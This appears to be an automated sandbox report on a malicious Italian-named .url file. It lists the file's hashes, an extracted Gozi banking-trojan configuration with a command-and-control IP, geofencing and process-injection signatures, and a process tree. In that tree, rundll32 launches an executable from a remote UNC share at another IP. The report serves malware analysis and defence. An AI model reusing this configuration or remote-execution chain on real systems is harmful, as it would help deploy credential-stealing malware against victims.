Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2023 14:19
Static task
static1
Behavioral task
behavioral1
Sample
Informazioni.url
Resource
win7-20230831-en
windows7-x64
1 signatures
150 seconds
General
-
Target
Informazioni.url
-
Size
194B
-
MD5
71f0e30a7451930cd63fe6b7438489b8
-
SHA1
eadfb1b7d1e86c13ca0d19636f002cc1d238fc6e
-
SHA256
a0ba5ae2de98ecfe756c52976f8449177212dea143f8ab4c47c4c99f97c6517d
-
SHA512
a928b4237a9e31a6b8be8b2e1b89cb5268e3438c63a8cd33c8b660d0679593a6976ce14d719b608e478c42e8e665731bf481c57de0144a1e7cc1b1d7f3663947
Malware Config
Extracted
Family
gozi
Extracted
Family
gozi
Botnet
5050
C2
45.93.139.24
Attributes
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
rsa_pubkey.plain
aes.plain
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 4884 wrote to memory of 768 4884 rundll32.exe archivio.exe PID 4884 wrote to memory of 768 4884 rundll32.exe archivio.exe PID 4884 wrote to memory of 768 4884 rundll32.exe archivio.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Informazioni.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4884 -
\??\UNC\62.173.146.73\scarica\archivio.exe"\\62.173.146.73\scarica\archivio.exe"2⤵PID:768
-